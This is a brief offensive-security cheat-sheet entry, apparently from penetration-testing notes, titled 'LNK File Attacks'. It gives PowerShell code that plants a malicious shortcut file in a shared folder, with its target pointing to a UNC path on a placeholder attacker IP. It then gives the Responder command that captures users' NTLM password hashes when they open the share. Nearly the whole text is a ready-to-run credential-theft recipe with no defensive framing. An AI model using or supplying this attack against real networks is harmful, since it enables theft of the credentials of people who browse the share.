LNK File Attacks
Places a malicious file in a shared folder that can lead to capturing hashes through responder
$objShell = New-Object -ComObject WScript.shell
$lnk = $objShell.CreateShortcut("C:\test.lnk")
$lnk.TargetPath = "\\IP_ADDRESS_ATTACKER\@test.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Test"
$lnk.HotKey = "Ctrl+Alt+T"
$lnk.Save()
Start responder
sudo Responder.py -I eth0 -dPv
Navigate to the share and you should receive captured hashed in responder
Note: Make sure SMB is turned
ON
in responder.conf
Last updated